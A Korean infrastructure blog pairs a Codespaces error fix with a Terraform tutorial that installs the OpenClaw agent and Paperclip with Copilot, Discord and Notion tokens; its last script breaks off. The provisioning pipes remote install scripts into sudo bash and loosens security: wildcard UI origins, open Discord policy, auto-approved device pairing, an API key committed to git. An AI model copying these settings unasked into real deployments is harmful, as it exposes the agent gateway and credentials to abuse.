눙이의 인프라 메모장

codespace 원격 확장 호스트가 지난 5분 동안 3번 예기치 않게 종료되었습니다.

wogho — Thu, 9 Apr 2026 19:06:02 +0900

방대한 바이브코드를 사용하여, 원격 호스트가 뻗은 상황입니다.
코드스페이스의 크기나 레벨과 관련이 있습니다.

예를 들어, 8코어로 업그레이드하면 가끔 문제가 해결되는 것 같지만,
기본 2코어를 사용하면 더 자주 발생합니다.

해결 방법

1. 8-core로 사양 업데이트 (Chage machine type)
2. VScode로 열어서 작업하기 (Open in Visual Studio Code)
3. 새 작업 공간 재생성 하기 또는 로컬로 진행

3 가지 중 하나의 방법 선택

Remote Extension Host Fails on Codespaces off of main · Issue #1347 · microsoft/semantic-kernel

Describe the bug (As of main branch, today) After 5 minutes activity, the error “Remote Extension host terminated unexpectedly 3 times within the last 5 minutes.” Is displayed. To Reproduce Steps t...

github.com

Remote Extension host terminated unexpectedly 3 times within the last 5 minutes - General - Firebase Studio Community

Remote Extension host terminated unexpectedly 3 times within the last 5 minutes

experiencing the same issue, recreate new workspace is only resolution very small next.js learning project

community.firebasestudio.dev

무료 OpenClaw 환경 구축하기 (GitHub Copilot 및 Paperclip 연동)

wogho — Thu, 2 Apr 2026 15:44:33 +0900

해당 글은 Terraform을 통한 OpenClaw 설치 환경을 보여줍니다.

직접 타이핑하여 세팅하셔도 되고, Docker를 사용하셔도 좋습니다.
개인적으로 Docker가 가장 편안 선택지 아닐까 싶습니다.

Terraform 설치와 Oracle Cloud 인프라 구성은 해당 글을 참고 하시길 바랍니다.

로컬에 구축하셔도 좋고, 따로 개인 서버 돌리셔도 됩니다.

Terraform 활용한 Oracle Cloud 인스턴스 생성 — 눙이의 인프라 메모장

Terraform 활용한 Oracle Cloud 인스턴스 생성

OCI는 장기적인 인프라 관리의 어려움과 장기간 미사용에 대한 서버처리로 인해서 지속적으로 프로비저닝 해야하는 큰 불편이 있습니다.해당 글은 Terraform를 활용하여 Oracle Cloud 인스턴스 생성하

noong2.tistory.com

GitHub Copilot

GPT 모델을 무료로 사용하기 위해서는 GitHub Education 계정이 필요합니다.
만 13세 이상의 중학생부터 대학생, 교사 신분이시라면 날짜가 명시된 재학증명서을 통해서 신청이 가능합니다.

GitHub Education

github.com

학생 신분에 해당이 안된다면, 월 $10으로 이용이 가능하겠습니다.

저는 학생 계정이지만 Claude Opus 사용할것이기 때문에 Pro 플랜을 구독하였습니다.

이것 또한 부담이 되신다면, 사양 좋은 로컬 환경에 vLLM이나

무료 모델인 qwen3-coder:free 사용도 하나의 대안입니다.

Github 전체 요금제에 대한 비교 항목입니다.

GitHub 코필로트 계획 - GitHub 문서

Copilot에 사용 가능한 플랜에 대해 알아보세요.

docs.github.com

Github 플랜에 구독 하셨다면, OpenClaw 연동을 위한 키 발급이 필요합니다.
Github에 로그인 하셔서 다음 과정을 진행합니다.

프로필 아이콘 - Settings

Developer settings

Personal access tokens - Tokens (classic)

Copilot 선택 후 Generate token

키 값을 복사하여 따로 메모해둡니다.

토큰은 생성 직후 한 번만 보여주며, 놓치면 재발급해야 합니다.

발급한 토큰은 Terraform 변수 llm_api_key에 넣을 예정입니다.

Discord 봇

에이전트 소통을 위한 Discode 봇을 생성합니다.
텔레그램이나 슬랙같은 다른 메신저 앱도 연동이 가능합니다.

https://discord.com/developers/applications

Discord for Developers

Build games, experiences, and integrations for millions of users on Discord.

discord.com

Discord Developer 접속 후 신규 앱 만들기 - 애플리케이션 ID 복사

해당 애플리케이션 ID는 Terraform 변수 discord_client_id에 넣을 예정입니다.

Reset Token클릭 → 확인 → 토큰 복사

해당 Bot token은 Terraform 변수 discord_bot_token에 넣을 예정입니다.

토큰은 Reset 직후 한 번만 보여주며, 놓치면 다시 Reset해야 합니다.

이후 아래 3가지 항목을 체크합니다. - Save Changes

봇을 Discord 서버에 초대하기 위한 아래 링크로 이동합니다.

# 아래 URL에서 `<클라이언트ID>`를 위에서 복사한 Application ID로 교체:

https://discord.com/oauth2/authorize?client_id=<클라이언트ID>&permissions=277025770560&scope=bot

봇을 추가할 서버 선택 → Continue → Authorize

서버 멤버 목록에 봇이 나타나면 성공합니다.

Notion 토큰 (선택)

저는 추가적으로 Notion 연동을 선택 하였습니다.
아래 링크를 통해 API 키를 발급해줍니다.

마켓플레이스 프로필 | Notion

The AI workspace that works for you. | Notion

Build Custom Agents, search across all your apps, and automate busywork. The AI workspace where teams get more done, faster.

www.notion.com

New integration → 이름 입력 → 연결할 워크스페이스 선택 → Submit

Internal Integration Secret (`ntn_xxxx...`)을 복사 하여
Terraform 변수 notion_token에 넣을 예정입니다.

Notion에서 연동할 페이지/DB 열기 → 우측 상단 `···` → Connections → 생성한 Integration 추가

Integration을 페이지에 연결하지 않으면 API가 해당 페이지에 접근할 수 없습니다.

Terraform 구축

`discord_bot_token`: Discord Developer Portal → Bot → Reset Token
`discord_client_id`: Discord Developer Portal → General Information → Application ID
`llm_api_key`: GitHub Settings → Developer settings → Fine-grained PAT
`notion_token`: Notion → My Integrations → Internal Secret
`better_auth_secret`: 비워두면 자동 생성 (`openssl rand -hex 32`)

`terraform.tfvars` 파일로 한꺼번에 관리하면 편합니다.

# apps/terraform.tfvars 
discord_bot_token  = "MTIxNjk4..."
discord_client_id  = "1231234567890"
llm_api_key        = "github_pat_11AXXXXX..."
notion_token       = ""

Terraform 구축

메인 파이프라인

`null_resource`의 `remote-exec` provisioner를 6개로 나눠서,

각 단계가 독립적으로 실행, 디버깅 가능하게 구성하였습니다.

Phase 0: 기본 패키지 + Node.js 22.x
Phase 1: PM2 클린업
Phase 2: OpenClaw 설치 & 설정
Phase 3: Paperclip 설치 & 설정
Phase 4: nginx HTTPS 리버스 프록시
Phase 5: PM2 자동 시작 등록

이후 부터 IDE를 통해 바이브코딩하시면 더욱 좋습니다.

install_apps.tf (OpenClaw + PaperClip)

OpenClaw의 openclaw config set은 단순 key=value만 지원합니다.
`models.providers`처럼 배열/중첩 객체가 필요한 설정은 Python으로 직접 JSON 편집해야 합니다.

Github 연결과 LLM 모델명을 GPT5-mini로 설정 해주셔야 제한 한도내에 무료로 이용이 가능합니다.

여기서 주의할점은 절대 `github-models` 프로바이더로 사용을 하시면 안됩니다. (github-copilot 사용)
`github-models`는 GitHub Models API를 직접 호출하며, 요청당 8,000 토큰 하드 리밋이 있습니다. (Pro 포함)
때문에 유료 전환 시에도 과금 발생 ($0.00001/토큰 유닛)

`github-copilot` 프로바이더를 사용하면 Copilot Edu, Pro 구독으로 무료 + 128K 컨텍스트 사용 가능합니다.

GitHub Copilot - OpenClaw

docs.openclaw.ai

# ============================================================
# install_apps.tf
# OpenClaw & Paperclip AI 에이전트 및 디스코드 봇 구축용
# ============================================================

# ────────────────────────────────────────────────────────────
# 0. infra state에서 서버 IP 자동 참조
# ────────────────────────────────────────────────────────────
data "terraform_remote_state" "infra" {
  backend = "local"
  config = {
    path = "${path.module}/../infra/terraform.tfstate"
  }
}

locals {
  server_ip = data.terraform_remote_state.infra.outputs.instance_public_ip
}

# ────────────────────────────────────────────────────────────
# 1. 사용자 입력 변수 설정
# ────────────────────────────────────────────────────────────

variable "discord_bot_token" {
  description = "디스코드 봇 토큰"
  type        = string
  default     = "<Discord Developer Portal → Bot → Reset Token에서 발급한 봇 토큰>"
}

variable "llm_model" {
  description = "사용할 LLM 모델명 (github-copilot 프로바이더 사용)"
  type        = string
  default     = "gpt-5-mini"
}

variable "notion_token" {
  description = "Notion 통합 토큰"
  type        = string
  default     = "<Notion → My Integrations → Internal Integration Secret>"
}

variable "discord_client_id" {
  description = "디스코드 애플리케이션 Client ID (봇 초대 시 주로 필요)"
  type        = string
  default     = ""
}

variable "better_auth_secret" {
  description = "Paperclip authenticated 모드용 시크릿 (빈 값이면 서버에서 자동 생성)"
  type        = string
  default     = ""
}


# ────────────────────────────────────────────────────────────
# 2. 설치 및 실행 스크립트 (독립 실행형)
# ────────────────────────────────────────────────────────────

resource "null_resource" "install_ai_agents" {
  triggers = {
    config_hash = md5(join("-", [
      var.discord_bot_token,
      var.notion_token,
      var.llm_model,
      var.better_auth_secret,
      local.server_ip,
    ]))
  }

  connection {
    type        = "ssh"
    host        = local.server_ip
    user        = "ubuntu"
    private_key = file("<SSH 프라이빗 키 경로, 예: ~/.ssh/my_key.pem>")
    timeout     = "20m"
  }

  # ── Phase 0: 기본 패키지 & Node.js 22.x 강제 설치 ──────────
  provisioner "remote-exec" {
    inline = [
      "set -e",
      "LOG=/home/ubuntu/ai_setup.log",
      "exec >> \"$LOG\" 2>&1",
      "echo ''",
      "echo '========================================================'",
      "echo \"=== AI 에이전트 설치 시작: $(date '+%Y-%m-%d %H:%M:%S') ===\"",
      "echo '========================================================'",

      "export DEBIAN_FRONTEND=noninteractive",

      # iptables — SSH + 서비스 포트 + HTTPS 먼저 열기 (REJECT 규칙보다 앞에)
      "sudo iptables -I INPUT 1 -p tcp --dport 22    -j ACCEPT || true",
      "sudo iptables -I INPUT 2 -p tcp --dport 443   -j ACCEPT || true",
      "sudo iptables -I INPUT 3 -p tcp --dport 3443  -j ACCEPT || true",
      "sudo iptables -I INPUT 4 -p tcp --dport 18789 -j ACCEPT || true",
      "sudo iptables -I INPUT 5 -p tcp --dport 3100  -j ACCEPT || true",
      "sudo iptables-save | sudo tee /etc/iptables.rules > /dev/null || true",

      # 기본 패키지 + nginx (HTTPS reverse proxy용)
      "sudo apt-get update -y",
      "sudo apt-get install -y git curl wget build-essential jq python3 nginx openssl",

      # ── Node.js 22.x 강제 설치 ──
      # cloud-init이 Node 20.x를 먼저 설치하므로 조건 없이 항상 22.x 설치
      "echo '>>> Node.js 22.x 강제 설치 (기존 버전 무시)'",
      "curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -",
      "sudo apt-get install -y --allow-downgrades nodejs",
      "echo \">>> Node version: $(node -v)\"",

      # 현재 Node 버전 검증 (22.12 이상 필수)
      "NODE_MAJOR=$(node -v | sed 's/v//' | cut -d. -f1)",
      "if [ \"$NODE_MAJOR\" -lt 22 ]; then",
      "  echo 'ERROR: Node.js 22+ 설치 실패' && exit 1",
      "fi",

      # npm 글로벌 도구 — Node 22 기준으로 재설치
      "sudo npm install -g pnpm@latest",
      "sudo npm install -g pm2@latest",
      "echo \">>> pnpm version: $(pnpm -v)\"",
      "echo \">>> pm2  version: $(pm2 -v)\"",

      # Docker (이미 설치되어 있으면 건너뜀)
      "if ! command -v docker > /dev/null 2>&1; then",
      "  curl -fsSL https://get.docker.com -o /tmp/get-docker.sh && sudo sh /tmp/get-docker.sh",
      "  sudo usermod -aG docker ubuntu",
      "fi",
      "sudo systemctl enable docker && sudo systemctl start docker || true",
    ]
  }

  # ── Phase 1: PM2 정리 & 기존 프로세스 전부 제거 ────────────
  provisioner "remote-exec" {
    inline = [
      "set -e",
      "exec >> /home/ubuntu/ai_setup.log 2>&1",
      "echo ''",
      "echo '=== PM2 클린업 ==='",

      # 기존 PM2 프로세스 & 데몬 완전 제거
      "pm2 kill 2>/dev/null || true",
      "pm2 flush 2>/dev/null || true",

      # OpenClaw gateway가 포트를 잡고 있을 수 있으므로 강제 종료
      "pkill -f 'openclaw.mjs' 2>/dev/null || true",
      "pkill -f 'openclaw gateway' 2>/dev/null || true",
      "sleep 2",

      # 포트 18789/3100/13100 을 사용 중인 프로세스 정리
      "sudo fuser -k 18789/tcp 2>/dev/null || true",
      "sudo fuser -k 3100/tcp  2>/dev/null || true",
      "sudo fuser -k 13100/tcp 2>/dev/null || true",
      "sleep 1",
      "echo '>>> PM2 클린업 완료'",
    ]
  }

  # ── Phase 2: OpenClaw 설치 & 설정 ──────────────────────────
  provisioner "remote-exec" {
    inline = [
      "set -e",
      "exec >> /home/ubuntu/ai_setup.log 2>&1",
      "echo ''",
      "echo '=== OpenClaw 설치 ==='",

      # OpenClaw 글로벌 설치
      "sudo npm install -g openclaw@latest",
      "echo \">>> OpenClaw version: $(openclaw --version 2>/dev/null || echo 'unknown')\"",

      # ── OpenClaw 설정: openclaw config set CLI 사용 ──
      # (주의: 구버전의 agent 키가 아닌 새 스키마 사용)
      "openclaw config set gateway.mode    local",
      "openclaw config set gateway.bind    lan",
      "openclaw config set channels.discord.token '${var.discord_bot_token}'",
      # ── GitHub Copilot 프로바이더 인증 (device flow) ──
      # ⚠️ github-models 절대 사용 금지! 요청당 8K 토큰 제한 + 과금됨
      # github-copilot은 Copilot Pro 구독에 포함 (추가 비용 없음)
      "openclaw models auth login-github-copilot --yes || echo 'Copilot 인증 실패 — 수동으로 실행 필요'",
      "openclaw models set github-copilot/${var.llm_model}",

      # trustedProxies + controlUi.allowedOrigins — Python으로 주입
      <<-PYBLOCK
      python3 -c "
import json, os, pathlib

config_path = pathlib.Path(os.path.expanduser('~/.openclaw/openclaw.json'))
config = json.loads(config_path.read_text()) if config_path.exists() else {}

# nginx(127.0.0.1)를 trusted proxy로 등록 — 프록시 경유 시 로컬 취급
config.setdefault('gateway', {})
config['gateway']['trustedProxies'] = ['127.0.0.1', '::1']

# Control UI 외부 origin 허용
config['gateway'].setdefault('controlUi', {})
config['gateway']['controlUi']['allowedOrigins'] = ['*']

# Discord 채널 정책: 'open'으로 설정하여 모든 채널에서 봇 응답 허용
# (기본값 'allowlist'는 허용 목록이 비어있어 모든 채널이 차단됨)
config.setdefault('channels', {})
config['channels'].setdefault('discord', {})
config['channels']['discord']['groupPolicy'] = 'open'

config_path.write_text(json.dumps(config, indent=2))
print('>>> OpenClaw config updated via Python')
"
      PYBLOCK
      ,

      # OpenClaw 설정 확인
      "echo '>>> OpenClaw config:'",
      "cat ~/.openclaw/openclaw.json | jq . 2>/dev/null || cat ~/.openclaw/openclaw.json",

      # ── PM2용 bash wrapper 스크립트 생성 ──
      # PM2는 .mjs 심볼릭 링크에 -- 인자를 전달할 수 없으므로 wrapper 필요
      "OPENCLAW_MJS=$(readlink -f $(which openclaw) 2>/dev/null || echo '/usr/lib/node_modules/openclaw/openclaw.mjs')",
      "cat > /home/ubuntu/start-openclaw.sh << 'WRAPPER'",
      "#!/bin/bash",
      "exec /usr/bin/node $OPENCLAW_MJS gateway",
      "WRAPPER",
      # wrapper 안의 $OPENCLAW_MJS를 실제 경로로 치환
      "sed -i \"s|\\$OPENCLAW_MJS|$OPENCLAW_MJS|g\" /home/ubuntu/start-openclaw.sh",
      "chmod +x /home/ubuntu/start-openclaw.sh",
      "echo \">>> Wrapper script: $(cat /home/ubuntu/start-openclaw.sh)\"",

      # PM2로 OpenClaw gateway 실행
      "pm2 start /home/ubuntu/start-openclaw.sh --name openclaw --interpreter bash",
      "sleep 8",

      # 첫 번째 대기 중인 장치 pairing 자동 승인
      "openclaw devices approve --latest 2>/dev/null || echo '대기 중인 pairing 요청 없음'",

      "pm2 logs openclaw --lines 15 --nostream || true",
      "echo '>>> OpenClaw 설치 완료'",
    ]
  }

  # ── Phase 3: Paperclip 설치 & 설정 ─────────────────────────
  provisioner "remote-exec" {
    inline = [
      "set -e",
      "exec >> /home/ubuntu/ai_setup.log 2>&1",
      "echo ''",
      "echo '=== Paperclip 설치 ==='",

      # Paperclip 소스 클론
      "sudo mkdir -p /opt/paperclip",
      "sudo chown ubuntu:ubuntu /opt/paperclip",
      "cd /opt/paperclip",

      "if [ ! -d '/opt/paperclip/.git' ]; then",
      "  git clone https://github.com/paperclipai/paperclip.git /opt/paperclip",
      "else",
      "  cd /opt/paperclip && git pull --ff-only || true",
      "fi",
      "cd /opt/paperclip",

      # BETTER_AUTH_SECRET 생성 (변수 비어있으면 자동 생성)
      "BETTER_AUTH_SECRET='${var.better_auth_secret}'",
      "if [ -z \"$BETTER_AUTH_SECRET\" ]; then",
      "  BETTER_AUTH_SECRET=$(openssl rand -hex 32)",
      "  echo \">>> BETTER_AUTH_SECRET 자동 생성됨\"",
      "fi",

      # .env 생성
      "cat > /opt/paperclip/.env << EOT",
      "LLM_MODEL=${var.llm_model}",
      "NOTION_TOKEN=${var.notion_token}",
      "DISCORD_CLIENT_ID=${var.discord_client_id}",
      "COMPANY_NAME=bllocorp",
      "HOST=0.0.0.0",
      "PAPERCLIP_DEPLOYMENT_MODE=authenticated",
      "PAPERCLIP_AUTH_BASE_URL_MODE=explicit",
      "BETTER_AUTH_SECRET=$BETTER_AUTH_SECRET",
      "PAPERCLIP_PUBLIC_URL=https://${local.server_ip}:3443",
      "PAPERCLIP_AUTH_DISABLE_SIGN_UP=true",
      "EOT",

      "echo '>>> .env 생성 완료'",

      # Paperclip allowedHostnames config 생성 (외부 IP 접속 허용)
      "mkdir -p /home/ubuntu/.paperclip/instances/default",
      <<-PYALLOWED
      python3 -c "
import json, pathlib
p = pathlib.Path('/home/ubuntu/.paperclip/instances/default/config.json')
if p.exists():
    c = json.loads(p.read_text())
else:
    c = {}
hosts = set(c.get('allowedHostnames', []))
hosts.update(['localhost', '127.0.0.1', '${local.server_ip}'])
c['allowedHostnames'] = sorted(hosts)
p.write_text(json.dumps(c, indent=2))
print('>>> Paperclip allowedHostnames:', c['allowedHostnames'])
"
      PYALLOWED
      ,

      # 의존성 설치
      "cd /opt/paperclip",
      "pnpm install --frozen-lockfile 2>/dev/null || pnpm install",

      # PM2용 bash wrapper 생성 (환경변수 .env 로드 + pnpm dev)
      "cat > /home/ubuntu/start-paperclip.sh << 'PPWRAP'",
      "#!/bin/bash",
      "cd /opt/paperclip",
      "set -a; source /opt/paperclip/.env; set +a",
      "exec pnpm dev",
      "PPWRAP",
      "chmod +x /home/ubuntu/start-paperclip.sh",

      # PM2로 Paperclip 실행 (bash wrapper 경유 — 환경변수 안정적 전달)
      "pm2 start /home/ubuntu/start-paperclip.sh --name paperclip --interpreter bash",
      "sleep 8",
      "pm2 logs paperclip --lines 15 --nostream || true",
      "echo '>>> Paperclip 설치 완료'",
    ]
  }

  # ── Phase 3-b: OpenClaw agent API key 사전 생성 ─────────────
  # Paperclip이 기동된 뒤 곧바로 agent API key를 생성하여
  # ~/.openclaw/workspace/paperclip-claimed-api-key.json 에 저장.
  # 이렇게 하면 첫 번째 heartbeat run에서 파일이 없어 실패하는 문제를 방지.
  provisioner "remote-exec" {
    inline = [
      "set -e",
      "exec >> /home/ubuntu/ai_setup.log 2>&1",
      "echo ''",
      "echo '=== Paperclip agent API key 사전 생성 ==='",

      # Paperclip이 완전히 올라올 때까지 최대 60초 대기
      "for i in $(seq 1 12); do",
      "  STATUS=$(curl -s -o /dev/null -w '%{http_code}' http://127.0.0.1:3100/api/health 2>/dev/null || echo '000')",
      "  if [ \"$STATUS\" = '200' ]; then echo '>>> Paperclip health OK'; break; fi",
      "  echo \">>> Paperclip 아직 준비 중... ($i/12)\"; sleep 5",
      "done",

      # OpenClaw agent가 Paperclip에 등록될 때까지 최대 30초 대기
      "AGENT_ID=''",
      "for i in $(seq 1 10); do",
      "  AGENT_ID=$(curl -s http://127.0.0.1:3100/api/agents -H 'x-paperclip-local-admin: 1' 2>/dev/null | python3 -c \"import json,sys; rows=json.load(sys.stdin); a=next((r for r in rows if 'openclaw' in (r.get('name','') or '').lower()),None); print(a['id'] if a else '')\" 2>/dev/null || echo '')",
      "  if [ -n \"$AGENT_ID\" ]; then echo \">>> Agent ID: $AGENT_ID\"; break; fi",
      "  echo \">>> OpenClaw agent 등록 대기 중... ($i/10)\"; sleep 3",
      "done",

      # Agent ID 확인 실패 시 건너뜀 (설치 자체는 중단하지 않음)
      "if [ -z \"$AGENT_ID\" ]; then echo '>>> WARN: agent 미등록 — key 사전 생성 건너뜀'; exit 0; fi",

      # agent API key 생성 (local admin 헤더 사용)
      "KEY_JSON=$(curl -s -X POST http://127.0.0.1:3100/api/agents/$AGENT_ID/keys -H 'Content-Type: application/json' -H 'x-paperclip-local-admin: 1' -d '{\"label\":\"bootstrap-key\"}' 2>/dev/null || echo '')",
      "TOKEN=$(echo \"$KEY_JSON\" | python3 -c \"import json,sys; d=json.load(sys.stdin); print(d.get('token',''))\" 2>/dev/null || echo '')",
      "KEY_ID=$(echo \"$KEY_JSON\" | python3 -c \"import json,sys; d=json.load(sys.stdin); print(d.get('id',''))\" 2>/dev/null || echo '')",

      "if [ -z \"$TOKEN\" ]; then echo '>>> WARN: API key 생성 실패 — 건너뜀'; exit 0; fi",
      "echo \">>> API key 생성 완료 (keyId: $KEY_ID)\"",

      # ~/.openclaw/workspace/ 에 JSON 파일로 저장
      "mkdir -p /home/ubuntu/.openclaw/workspace",
      "python3 -c \"",
      "import json, sys",
      "token = '$TOKEN'",
      "key_id = '$KEY_ID'",
      "agent_id = '$AGENT_ID'",
      "import datetime",
      "data = {'keyId': key_id, 'token': token, 'agentId': agent_id, 'createdAt': datetime.datetime.utcnow().isoformat() + 'Z'}",
      "import pathlib",
      "p = pathlib.Path('/home/ubuntu/.openclaw/workspace/paperclip-claimed-api-key.json')",
      "p.write_text(json.dumps(data))",
      "p.chmod(0o600)",
      "print('>>> paperclip-claimed-api-key.json 저장 완료:', str(p))",
      "\"",

      # git workspace에도 커밋
      "cd /home/ubuntu/.openclaw/workspace",
      "git add paperclip-claimed-api-key.json 2>/dev/null || true",
      "git commit -m 'chore: add bootstrap paperclip api key' 2>/dev/null || true",
      "echo '>>> git commit 완료'",
    ]
  }

  # ── Phase 4: nginx HTTPS reverse proxy 설정 ────────────────
  provisioner "remote-exec" {
    inline = [
      "set -e",
      "exec >> /home/ubuntu/ai_setup.log 2>&1",
      "echo ''",
      "echo '=== nginx HTTPS 프록시 설정 ==='",

      # 자체 서명 SSL 인증서 생성 (10년 유효)
      "sudo mkdir -p /etc/nginx/ssl",
      "if [ ! -f /etc/nginx/ssl/selfsigned.crt ]; then",
      "  sudo openssl req -x509 -nodes -days 3650 -newkey rsa:2048 -keyout /etc/nginx/ssl/selfsigned.key -out /etc/nginx/ssl/selfsigned.crt -subj '/CN=${local.server_ip}/O=OpenClaw/C=KR'",
      "  echo '>>> SSL 인증서 생성 완료'",
      "fi",

      # nginx 설정 — OpenClaw(443) + Paperclip(3443) HTTPS reverse proxy
      "cat > /tmp/openclaw-ssl << 'NGINXCONF'",
      "server {",
      "    listen 443 ssl;",
      "    server_name _;",
      "    ssl_certificate     /etc/nginx/ssl/selfsigned.crt;",
      "    ssl_certificate_key /etc/nginx/ssl/selfsigned.key;",
      "    ssl_protocols       TLSv1.2 TLSv1.3;",
      "    location / {",
      "        proxy_pass http://127.0.0.1:18789;",
      "        proxy_http_version 1.1;",
      "        proxy_set_header Upgrade $http_upgrade;",
      "        proxy_set_header Connection \"upgrade\";",
      "        proxy_set_header Host $http_host;",
      "        proxy_set_header X-Real-IP $remote_addr;",
      "        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;",
      "        proxy_set_header X-Forwarded-Proto https;",
      "        proxy_read_timeout 86400;",
      "        proxy_send_timeout 86400;",
      "    }",
      "}",
      "server {",
      "    listen 3443 ssl;",
      "    server_name _;",
      "    ssl_certificate     /etc/nginx/ssl/selfsigned.crt;",
      "    ssl_certificate_key /etc/nginx/ssl/selfsigned.key;",
      "    ssl_protocols       TLSv1.2 TLSv1.3;",
      "    location / {",
      "        proxy_pass http://127.0.0.1:3100;",
      "        proxy_http_version 1.1;",
      "        proxy_set_header Upgrade $http_upgrade;",
      "        proxy_set_header Connection \"upgrade\";",
      "        proxy_set_header Host $http_host;",
      "        proxy_set_header X-Real-IP $remote_addr;",
      "        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;",
      "        proxy_set_header X-Forwarded-Proto https;",
      "        proxy_read_timeout 86400;",
      "        proxy_send_timeout 86400;",
      "    }",
      "}",
      "NGINXCONF",
      "sudo mv /tmp/openclaw-ssl /etc/nginx/sites-available/openclaw-ssl",
      "sudo ln -sf /etc/nginx/sites-available/openclaw-ssl /etc/nginx/sites-enabled/",
      "sudo rm -f /etc/nginx/sites-enabled/default",
      "sudo nginx -t && sudo systemctl restart nginx",
      "sudo systemctl enable nginx",
      "echo '>>> nginx HTTPS 프록시 활성화 완료'",
    ]
  }

  # ── Phase 5: PM2 상태 저장 & 재부팅 시 자동 실행 등록 ──────
  provisioner "remote-exec" {
    inline = [
      "set -e",
      "exec >> /home/ubuntu/ai_setup.log 2>&1",
      "echo ''",
      "echo '=== PM2 자동 시작 등록 ==='",

      "pm2 save --force",
      "sudo env PATH=$PATH:/usr/bin pm2 startup systemd -u ubuntu --hp /home/ubuntu || true",

      # 최종 상태 출력
      "echo ''",
      "echo '========================================================'",
      "echo '=== 최종 상태 확인 ==='",
      "echo '========================================================'",
      "pm2 list",
      "echo ''",
      "echo \"Node.js: $(node -v)\"",
      "echo \"npm:     $(npm -v)\"",
      "echo \"pnpm:    $(pnpm -v)\"",
      "echo \"pm2:     $(pm2 -v)\"",
      "echo ''",

      # 서비스 바인딩 확인 (앱 + HTTPS 프록시)
      "echo '>>> 포트 바인딩 확인:'",
      "sudo ss -tlnp | grep -E '18789|3100|443|3443' || echo '경고: 서비스 포트 미감지'",

      "echo ''",
      "echo \"=== 완료: $(date '+%Y-%m-%d %H:%M:%S') ===\"",
    ]
  }
}

output "instance_public_ip" {
  description = "설치된 서버 공인 IP"
  value       = local.server_ip
}

output "openclaw_url" {
  description = "OpenClaw Gateway URL (HTTPS)"
  value       = "https://${local.server_ip}"
}

output "paperclip_url" {
  description = "Paperclip URL (HTTPS)"
  value       = "https://${local.server_ip}:3443"
}

# terraform plan  -target "null_resource.install_ai_agents"
# terraform apply -target "null_resource.install_ai_agents"

# ============================================================
# 설치 후 확인
# ============================================================

# PM2 프로세스 상태 확인
# ssh ubuntu@161.118.144.8 "pm2 list"
# 결과: openclaw, paperclip 모두 "online" 상태여야 함

# Discord 테스트
# 서버 채널에서 @claw 또는 슬래시 커맨드로 봇 테스트
# 예: @claw 안녕
#     /agents hi
# 응답 예: "안녕하세요! 무엇을 도와드릴까요?"

# API 할당량 확인
# ssh ubuntu@161.118.144.8 "openclaw models status"
# 결과: "github-copilot usage: Premium XX% left · Chat 100% left"
# Premium 0%가 되면 Copilot Pro 결제 필요

참고 사항

- 포트 13100은 Paperclip의 WebSocket dev 서버 포트이며, 정리하지 않으면 충돌합니다.

- PM2가 `.mjs` 파일의 심볼릭 링크를 ESM 모듈로 실행할 때, `--` 뒤 인자를 무시하는 버그가 있습니다.
bash wrapper에서 `exec /usr/bin/node <경로> gateway`로 직접 호출하면 해결됩니다.

- 브라우저에서 Control UI 접속 시 "origin not allowed" 에러가 나면 `controlUi.allowedOrigins`를 `['*']`로 설정합니다.

- OpenClaw는 새 장치(브라우저) 연결 시 pairing 승인이 필요한 구조입니다.
`openclaw devices approve --latest`로 자동 승인하며, 수동으로는 Control UI에서 승인합니다.

- OpenClaw Control UI는 WebCrypto API를 사용합니다.
대부분의 브라우저는 `http://`에서 WebCrypto를 차단하며 (Secure Context 필수).
자체 서명 인증서라도 `https://`이면 동작합니다. 브라우저 경고만 무시하면 됩니다.
(* 정 거슬리시면 자체 도메인 구성하시거나, XRDP를 통해서 로컬로 접속하시면됩니다.)

Paperclip

Paperclip은 여러 AI Agent를 조직처럼 관리하고 협업시키는 AI 회사 운영 플랫폼 오픈소스입니다.
각자의 역할과 권한에 따라 비즈니스 목표를 달성하도록 오케스트레이션(Orchestration)하는 중앙 제어 시스템입니다.

paperclipai/paperclip: Open-source orchestration for zero-human companies

GitHub - paperclipai/paperclip: Open-source orchestration for zero-human companies

Open-source orchestration for zero-human companies - paperclipai/paperclip

github.com

구축 사항

- Paperclip은 `pnpm start` 스크립트가 없으며,

`pnpm dev`만 동작합니다. 처음에 `pnpm start`로 실행해서 "Missing script" 에러가 발생합니다.

- `local_trusted`는 127.0.0.1 로컬 접속만 가능하며, `authenticated`는 0.0.0.0 접속 가능하기 때문에
즉, 외부 접속을 받으려면 반드시 `authenticated` 모드와 `HOST=0.0.0.0` 세팅이 필요하며,

`local_trusted`에서 `HOST=0.0.0.0`을 하면 보안 에러가 발생합니다.

- Paperclip은 외부 IP로 접속하면 "Hostname not allowed" 오류가 발생하기 때문에
`~/.paperclip/instances/default/config.json`에 허용할 호스트명을 등록해야 합니다.

접속 및 세팅

OpenClaw Control UI - https://<서버IP>
Paperclip - https://<서버IP>:3443
* 개인적으로 개인 도메인 구성을 권장합니다.

첫 브라우저 접속 시 "pairing required" 에러가 난다면
아래 명령어를 통해 장치를 승인합니다.

openclaw devices approve --latest

Agent - Skills

사용 할 skills 항목에 맞게 활성화 해주시면됩니다.

Paperclip + OpenClaw 연동

우선 Paperclip 접속하여 초기 설정을 완료합니다.

회사 이름 입력후 모두 기본값으로 넘어가 줍니다.
초기설정에는 OpenClaw Gateway가 비활성화 상태입니다.

Paperclip UI → Settings → Invites → 초대 링크 생성

URL 값의 pcp_invite_<번호>를 기억합니다.

이후 OpenClaw 서버에서 초대를 수락해야합니다.

매번 curl 치기 번거로우므로 `join_paperclip.sh` 스크립트를 작성합니다.
pcp_invite_<번호>에 Paperclip에서 생성했던 초대 URL값을 작성합니다.

스크립트 안의 초대 코드(`pcp_invite_xxxx`)는 매번 새로 생성한 코드로 교체해야 합니다.
초대 코드는 1회용이므로, 재연동 시에는 Paperclip UI에서 새 초대를 생성합니다.

#!/bin/bash
set -e

TOKEN=$(cat /home/ubuntu/.openclaw/openclaw.json | jq -r '.gateway.auth.token')
echo "Token: $TOKEN"

BODY=$(python3 -c "
import json
body = {
    'requestType': 'agent',
    'agentName': 'OpenClaw',
    'adapterType': 'openclaw_gateway',
    'capabilities': 'OpenClaw agent adapter',
    'agentDefaultsPayload': {
        'url': 'ws://127.0.0.1:18789',
        'paperclipApiUrl': 'https://127.0.0.1:3443',
        'headers': {'x-openclaw-token': '$TOKEN'},
        'waitTimeoutMs': 120000,
        'sessionKeyStrategy': 'issue',
        'role': 'operator',
        'scopes': ['operator.admin']
    }
}
print(json.dumps(body))
")
